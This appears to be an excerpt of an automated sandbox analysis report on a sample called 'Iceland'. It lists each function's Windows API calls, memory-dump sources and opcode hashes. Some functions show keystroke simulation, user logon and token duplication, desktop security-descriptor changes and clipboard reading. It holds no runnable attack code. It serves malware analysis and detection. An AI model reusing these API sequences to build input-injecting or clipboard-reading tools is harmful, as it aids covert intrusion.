                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                • Opcode ID: 1ad7a0cbee4949e1f7480406cd51663bf8c2513a94d136c5ed5f4d1d4b633af0
                                                                                                                                                                                                                                                                • Instruction ID: 29aaddd9bc99a250c7887cd9d0ada400340a215f398c1af8fde5b4396cda88f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ad7a0cbee4949e1f7480406cd51663bf8c2513a94d136c5ed5f4d1d4b633af0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF02B71708B01AAE7308BB49C05BB1F7F8BB00315F14C61EE4D9C3182D7B244D49B91
                                                                                                                                                                                                                                                                Function 00A2684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __fread_nolock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                • Instruction ID: f5cd8551f0b3daa41454b2bd5b4d7b7023beed51e880d1734a000d1fa8f3410f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF0F87550020DFFDF05DF94C941E9E7B79FF04318F208445F9159A151C336EA21ABA1
                                                                                                                                                                                                                                                                Function 00A23907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A23963
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                • Opcode ID: 9a52a359dbc5e0f6bd0bcf1dc7bd99e9599996b30b4e17c64c6a790260f24d99
                                                                                                                                                                                                                                                                • Instruction ID: e57de056ac5ea96577170bd7655029cc18953d86d602bb15bfc80816ba0d113e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a52a359dbc5e0f6bd0bcf1dc7bd99e9599996b30b4e17c64c6a790260f24d99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22F037B19143189FEB52DFA4DC45BD57FBCA70170CF0001A5A6449A192D7745B89CF51
                                                                                                                                                                                                                                                                Function 00A23A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A23A76
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 541455249-0
                                                                                                                                                                                                                                                                • Opcode ID: aebbbf90f86aff6e72b563137399946aa1c3a0cea15c6d43aaefeb18250971db
                                                                                                                                                                                                                                                                • Instruction ID: a2f21a403a4b974d4d78c6aeb17bb28acff150d208947e44a93bb0acc619c89b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aebbbf90f86aff6e72b563137399946aa1c3a0cea15c6d43aaefeb18250971db
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9E0C276A002245BCB20E2A8AC06FEA77EDDFC87A0F0441B1FC09D7258E964ED808690
                                                                                                                                                                                                                                                                Function 00A6071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,00A60A84,?,?,00000000,?,00A60A84,00000000,0000000C), ref: 00A60737
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                • Opcode ID: 9e14b3c8d00df2876dc35930847638e68181ee88845a4c51b60c81807cc1ef46
                                                                                                                                                                                                                                                                • Instruction ID: 09a7f36f4f35f8219fe94c6a05ffefc8fefceb399fc93d29913f66530c9a959d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e14b3c8d00df2876dc35930847638e68181ee88845a4c51b60c81807cc1ef46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D06C3200010DBBDF028F84ED06EDA3BAAFB48714F014100BE1866020C732E832AB90
                                                                                                                                                                                                                                                                Function 00A8EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: ee337016b10d81809a2828717ec84d3edaed722cf4f600aa9bde3317768b99f4
                                                                                                                                                                                                                                                                • Instruction ID: 0834183adb49da130e3f6e75dc08bf936ed287f102b5694718f3202f059e173b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee337016b10d81809a2828717ec84d3edaed722cf4f600aa9bde3317768b99f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52B0923800060085AD2CAB385A1999973007842BE67DC1BC0E479850F2E339880FBA50
                                                                                                                                                                                                                                                                Function 00A9664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: FindFirstFileW.KERNEL32(?,?), ref: 00A8DCCB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A8DD1B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A8DD2C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DC54: FindClose.KERNEL32(00000000), ref: 00A8DD43
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9666E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                • Opcode ID: 81606a079e11a3d05a8471da5b31236dc55ffa70a59d9b407453e081eb83dd79
                                                                                                                                                                                                                                                                • Instruction ID: 86c48b2ad1dab7cbbb56b763dffef82b9e2008dc73e757dddaaa412b2e2b2cfb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81606a079e11a3d05a8471da5b31236dc55ffa70a59d9b407453e081eb83dd79
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF08C362002108FCB14EF58E945B6EB7E5BF88320F048429F90A8B362CB74BC01CB90

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 00A3FC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00A3FC86
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A7FCB8
                                                                                                                                                                                                                                                                • IsIconic.USER32(00000000), ref: 00A7FCC1
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000009), ref: 00A7FCCE
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A7FCD8
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A7FCEE
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A7FCF5
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A7FD01
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A7FD12
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A7FD1A
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A7FD22
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A7FD25
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD3A
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD45
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD4F
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD54
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD5D
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD62
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A7FD6C
                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A7FD71
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A7FD74
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A7FD9B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                                                • Opcode ID: e9227b319246b6a65107581c7b39ff6d6511db8313a4c4133b18ee44fe8fc8e6
                                                                                                                                                                                                                                                                • Instruction ID: 90d662fa8c189b340306700e0470165f70c68b3f1372e4e9cf3e262293a6647d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9227b319246b6a65107581c7b39ff6d6511db8313a4c4133b18ee44fe8fc8e6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1319471A402187FEB31ABF54C49FBF7E7CEB44B54F104165FA04E61E2E6B05D01AAA0
                                                                                                                                                                                                                                                                Function 00A81B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A8205A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A82087
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: GetLastError.KERNEL32 ref: 00A82097
                                                                                                                                                                                                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A81BD2
                                                                                                                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A81BF4
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A81C05
                                                                                                                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A81C1D
                                                                                                                                                                                                                                                                • GetProcessWindowStation.USER32 ref: 00A81C36
                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 00A81C40
                                                                                                                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A81C5C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A81B48), ref: 00A81A20
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A0B: CloseHandle.KERNEL32(?,?,00A81B48), ref: 00A81A35
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                • String ID: $default$winsta0
                                                                                                                                                                                                                                                                • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                • Opcode ID: f75b03a1a5c78e237636b32c8bc80dcaf0f7ccc046014d62655c6bca7ebcd722
                                                                                                                                                                                                                                                                • Instruction ID: 8c7f5a1e7e2213e0744fdb4d1f694e41108834725da954cdfe1313fcdeb3f149
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f75b03a1a5c78e237636b32c8bc80dcaf0f7ccc046014d62655c6bca7ebcd722
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F8168B1900209AFDF11EFA4DD49FEE7BBCEF08304F144129F915A62A1E7718A46CB60
                                                                                                                                                                                                                                                                Function 00A814AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A81A60
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A6C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A82
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A81A99
                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A81518
                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A8154C
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A81563
                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00A8159D
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A815B9
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00A815D0
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A815D8
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A815DF
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A81600
                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00A81607
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A81636
                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A81658
                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A8166A
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A81691
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A81698
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A816A1
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A816A8
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A816B1
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A816B8
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A816C4
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A816CB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: GetProcessHeap.KERNEL32(00000008,00A814FD,?,00000000,?,00A814FD,?), ref: 00A81AED
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A814FD,?), ref: 00A81AF4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A814FD,?), ref: 00A81B03
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                • Opcode ID: b4f79056fea6da58e47c913dc5a2c24533b75dc3e5757497f13a531527111f89
                                                                                                                                                                                                                                                                • Instruction ID: e78cfcd0b5fba7f8276e0fc889bfe70c7684781f50a40536c913852bb8ee05ac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4f79056fea6da58e47c913dc5a2c24533b75dc3e5757497f13a531527111f89
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F714EB1900209ABDF10EFA5DC44FAEBBBDFF04351F184625E955A71A1E7319906CB60
                                                                                                                                                                                                                                                                Function 00A9F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00ABDCD0), ref: 00A9F586
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A9F594
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00A9F5A0
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00A9F5AC
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00A9F5E4
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00A9F5EE
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00A9F619
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00A9F626
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 00A9F62E
